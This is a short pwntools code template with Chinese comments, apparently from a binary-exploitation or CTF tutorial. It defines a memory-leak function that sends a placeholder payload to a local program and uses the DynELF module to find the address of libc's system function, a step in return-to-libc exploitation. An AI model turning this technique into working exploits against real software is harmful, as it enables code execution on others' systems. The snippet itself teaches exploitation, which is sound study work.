1. p = process('./xxx')
    2. def leak(address):
    3.   #各种预处理
    4.   payload = "xxxxxxxx" + address + "xxxxxxxx"
    5.   p.send(payload)
    6.   #各种处理
    7.   data = p.recv(4)
    8.   log.debug("%#x => %s" % (address, (data or '').encode('hex')))
    9.   return data
    10. d = DynELF(leak, elf=ELF("./xxx"))      #初始化DynELF模块 
    11. systemAddress = d.lookup('system', 'libc')  #在libc文件中搜索system函数的地址